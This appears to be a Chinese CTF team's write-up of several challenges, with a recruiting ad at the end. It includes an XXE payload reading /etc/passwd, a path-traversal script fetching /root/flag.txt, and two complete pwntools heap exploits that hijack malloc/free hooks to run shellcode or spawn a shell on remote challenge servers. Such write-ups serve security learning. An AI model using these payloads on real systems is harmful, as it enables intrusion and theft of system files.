恭喜Venom在本次比赛中获得第四名的好成绩!(团队收人,能熬的那种~)
Game
解题思路
post /score.php
score=15
就会有 flag
$.ajax({
url: 'score.php',
type: 'POST',
data: 'score='+15,
success: function(data){
var data = data;
$("#output").text(data);
}
})
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<feedback>
<author>&xxe;</author>
</feedback>
/proc/self/fd/2
file读不到,用php filter读
flag在 index.php注释部分
show_me_your_image
import string
import requests as req
import base64
import urllib
·
z = {'0': 'Y', '2': 'P', '4': 'y', '6': 'e', '8': 'v', 'B': 'z', 'D': 'N', 'F': 't', 'H': 'x', 'J': 'U', 'L': 'X', 'N': 'F', 'P': 'V', 'R': 'q', 'T': 'a', 'V': 'l', 'X': 'm', 'Z': 'S', 'b': '4', 'd': 'B', 'f': 'h', 'h': '5', 'j': 'c', 'l': 'M', 'n': '9', 'p': 'w', 'r': '1', 't': '8', 'v': 'o', 'x': 'i', 'z': 'K',
'+': 'u', '/': 'A', '1': '0', '3': 'C', '5': 'T', '7': 'I', '9': 'k', 'A': 'b', 'C': 'J', 'G': '7', 'I': 'f', 'K': '6', 'M': 'Z', 'O': '2', 'Q': '+', 'S': 'd', 'U': '3', 'W': 'R', 'Y': 'W', 'a': 'L', 'c': 'r', 'e': 'g', 'g': 'n', 'i': 'E', 'k': 'j', 'm': 'G', 'o': 'H', 'q': 'Q', 's': 'p', 'u': 's', 'w': 'O', 'y': 'D', 'E': '\\'}
b64table = string.maketrans(
''.join(z.keys()), ''.join([z[k] for k in z.keys()]))
b64table2 = string.maketrans(
''.join([z[k] for k in z.keys()]), ''.join(z.keys()))
URL = 'http://3fc6a707471d4c83959773ac33db4ec348f07f0fa23e4e15.changame.ichunqiu.com/img.php?name={}'
def get(pl):
pl = base64.b64encode(pl)
print "[+] Normal Base64 :", pl
pl = pl.translate(b64table2)
print "[+] Encode Base64 :", pl
pl = urllib.quote(pl)
res = req.get(URL.format(pl))
print(res.content)
def test(pl):
pl = pl.translate(b64table)
pl = base64.b64decode(pl)
print pl
if __name__ == '__main__':
get("../../../../../../proc/self/cwd/templates/upload.html")
get("../../../../../../root/flag.txt")
签到题
解题思路
dig txt gamectf.com
gamectf.com. 600 IN TXT "flag{welcome_TXT}"
CodeValues
dd if=24w.png of=1.zip skip=22838 bs=1
7z x 1.zip
解压出图片后转黑白,扫描二维码即得flag
flag{24_word_m4n7ra}
修复文件头GIF8
po叔说有的帧有问题
一帧一帧save后查看,在7/66帧找到flag:
解题思路
下载之后爆破zip密码,爆破出来为loli
解压之后把图片拖到16进制编辑器,在尾部不发现Ook编码,解码就行了
flag{f71d6bca-3210-4a31-9feb-1768a65a33db}
SM4
解题思路
from pysm4 import encrypt, decrypt
key=[13, 204, 99, 177, 254, 41, 198, 163, 201, 226, 56, 214, 192, 194, 98, 104]
c=[46, 48, 220, 156, 184, 218, 57, 13, 246, 91, 1, 63, 60, 67, 105, 64, 149, 240, 217, 77, 107, 49, 222, 61, 155, 225, 231, 196, 167, 121, 9, 16, 60, 182, 65, 101, 39, 253, 250, 224, 9, 204, 154, 122, 206, 43, 97, 59]
key=''.join(map(chr,key)).encode('hex')
c=''.join(map(chr,c)).encode('hex')
print(key,c)
flag=''
for i in range(3):
flag+=(hex(decrypt(int(c[i*32:i*32+32],16), int(key,16)))[2:-1].decode('hex'))
print(flag)
dp
解题思路
from sympy import *
from sympy.core.numbers import igcdex
e=65537
n=9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
dp=81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
c=5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827
p = gcd(n, pow(2, e*dp, n) - 2)
q = n // p
d = long(igcdex(e, (p-1) * (q-1))[0]%n)
print(hex(pow(c,d,n))[2:-1].decode('hex'))
flag{c3009b61-f9ed-4b20-8855-edab53e89530}
解题思路
edit过程中根据strlen更新长度,存在堆溢出
而后程序有rwx段,更改free_hook到&shellcode即可
from pwn import *
context.log_level="debug"
def add(l,note):
#p.sendline("1")
global s
#p.sendline(str(l))
#p.send(note)
s+="1\n"+str(l)+"\n"+note
def delete(index):
global s
#p.sendline("2")
#p.sendline(str(index))
s+="2\n"+str(index)+"\n"
def edit(index,note):
global s
#p.sendline("3")
#p.sendline(str(index))
#p.send(note)
s+="3\n"+str(index)+"\n"+note
#p=process("./pwn")
p=remote("df0a72047d6c.gamectf.com",10001)
p.sendlineafter("Please input you token:\n","icq95702d8b2edd7591a517869c3f12f")
s=""
add(0x34,"a"*0x34)
add(0x34,"a"*0x34)
add(0x34,"a\n")
edit(0,"b"*0x34)
edit(0,"c"*0x34+"\x71")
delete(1)
add(0x34,"a"*0x34)
add(0x34,"a"*0x34)
add(0x38,"a"*0x38)
delete(2)
edit(3,p32(0x80EBA0c)+"\n")
add(0x34,"a"*0x34)
add(0x34,p32(0xf0)+"\n")
edit(5,p32(0xa0)+p32(0x080EB4F0)*15+p32(0x080EB4F0)+asm(shellcraft.cat("/flag"))+"\n")
edit(0,p32(0x80eba58)+"\n")
delete(5)
#gdb.attach(p)
p.sendline(s.encode("base64").replace("\n",""))
p.interactive()
多个字符串strcat时长度判断存在逻辑错误
可以绕过0x400的检测造成strcat时堆溢出
而后利用堆溢构造堆重叠,leak libc并修改malloc hook即可
改至one_target即可get shell:
from pwn import *
context.log_level="debug"
def add(size,note):
p.sendlineafter(">>> ","1")
p.sendlineafter(" : ",str(size))
p.sendafter(": ",note)
def show(index):
p.sendlineafter(">>> ","2")
p.sendlineafter(" : ",str(index))
p.recvuntil(": ")
return p.recvuntil("\n").strip()
def delete(index):
p.sendlineafter(">>> ","3")
p.sendlineafter(" : ",str(index))
def strcat(index1,index2):
p.sendlineafter(">>> ","4")
p.sendlineafter(" : ",str(index1))
p.sendlineafter(" : ",str(index2))
def fake(a):
p.sendlineafter(">>> ","5")
s=""
for i in a:
s+=str(i)+" "
p.sendlineafter(" : ",s[:-1])
#p=process("./pwn")
p=remote("a32f094e35d7.gamectf.com",20001)
add(0x18,"kirin\n")#0
add(0x400,"a"*0x3ff+"\n")#1
add(0x28,"b"*9+p64(0xb1)+"\n")#2
delete(0)
add(0x400,"kirin\n")#0
add(0x18,"kirin\n")#3
add(0x80,"kirin\n")
delete(0)
fake([1,2])
delete(3)
add(0x18,"aaaa\n")
libc_addr=u64(show(4)+"\x00\x00")
print hex(libc_addr)
add(0x68,"bbbb\n")
add(0x68,"bbbb\n")
delete(4)
delete(6)
delete(5)
hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0
add(0x68,p64(hook-0x23)+"\n")
add(0x68,p64(hook-0x23)+"\n")
add(0x68,"aaaa\n")
add(0x68,"\x00"*0x13+p64(libc_addr+0x7ffff7a10000-0x00007ffff7dd1b58+0xf2519)+"\n")
#gdb.attach(p)
p.interactive()
解题思路
def func2(s):
k=0
for i in range(10000):
if s==0:
break
k+=s%2
s=s/2
return k
def func3(s):
return s%2
p
rint func3(func2(1))
d
ef func1(n,l,r):
if l==r:
return l
mid=(l+r+1)/2
if(n<mid*mid):
return func1(n,l,mid-1)
else:
return func1(n,mid,r)
def _func1(s):
return func1(s,1,s)
print _func1(10)
def NEXTM(n,m):
if(m*m<=n):
return m+1
else:
return 0
def NEXTN(n,m):
return (n%m!=0)*n
def TEST(n,m):
if(n==0):
return 0
if(m==0):
return 1
return TEST(NEXTN(n,m),NEXTM(n,m))
def func4(n):
return TEST(n,2)
z=[963,4396,6666,1999,3141]
for j in z:
for i in range(1,100000000):
if(_func1(i)==j and func3(func2(i))==1):
print i
break
kkk=0+1
for i in range(3,10001):
kkk+=func4(i)
print kkk
flag{927369-19324816-44435556-3996001-9865881-1229}
直接拿python 实现一遍 然后爆破
flat
解题思路
key1 =[0x4A, 0x32, 0x32, 0x36, 0x31,
0x43, 0x36, 0x33, 0x2D, 0x33,
0x49, 0x32, 0x49, 0x2D, 0x45,
0x47, 0x45, 0x34, 0x2D, 0x49,
0x42, 0x43, 0x43, 0x2D, 0x49,
0x45, 0x34, 0x31, 0x41, 0x35,
0x49, 0x35, 0x46, 0x34, 0x48,
0x42]
len11=42
head="flag{"
weiba="}"
num="0123456789"
chrss="abcdefghijklmnopqrstuvwxyz"
xiahu=[13,18,23,28]
s=bytearray(36*':')
for i in range(len(key1)):
if(key1[i]==0x2d):
s[i]=0x2d
for f in chrss:
if ord(f)-0x30==key1[i]:
s[i]=ord(f)
for f in num:
if ord(f)+17==key1[i]:
s[i]=ord(f)
print s
#flag{9bbfa2fc-c8b8-464d-8122-84da0e8e5d71}
check1 2 3 4 表明字符串长度 头 尾 下划线的位置
check5 判断长度 对每个字符处理 然后对照表
因为格式是uuid 所以就变成了一个解了
招新小广告
ChaMd5 ctf组 长期招新
尤其是crypto+reverse+pwn+合约的大佬
欢迎联系admin@chamd5.org